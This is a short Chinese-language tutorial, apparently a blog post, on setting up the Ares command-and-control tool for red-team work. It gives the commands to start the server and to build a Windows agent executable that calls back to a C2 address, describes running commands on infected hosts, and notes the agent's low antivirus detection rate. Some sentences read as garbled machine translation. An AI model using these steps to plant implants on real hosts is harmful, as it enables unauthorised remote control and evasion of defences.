红队评估的高要求使得安全公司和安全顾问对有不同功能的命令和控制工具的开发工具产生了极大的兴趣。其中一些工具可用于官方活动,而其他一些工具仅用于研究目的。
Ares是一个用Python编写的命令和控制工具,由Kevin Locati开发。它有一个在8080端口上运行的Web界面,它受密码和密码保护。必须在运行服务器之前创建数据库。
./ares.py initdb ./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
一旦密码被设置,Ares将要求使用密码短语。
Ares的主界面只包含三个功能:
代理商名单更改密码断开代理列表是运行植入物的所有受感染主机将出现的页面。
在配置代理文件夹中的代理配置之前,必须将SERVER变量更改为命令和控制服务器正在运行的IP地址。config.py
如果安装了wine(Ares存储库包含wine setup脚本),则可以通过运行以下命令以可执行格式构建代理:
./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe
运行代理的主机将以以下格式显示在代理列表中。
可以从字段在目标主机上执行命令,并在控制台窗口中检索输出。
除了目标主机上的一些基本命令执行之外,Ares不提供其他功能。然而,该代理商当时对许多防病毒软件的检测率较低。
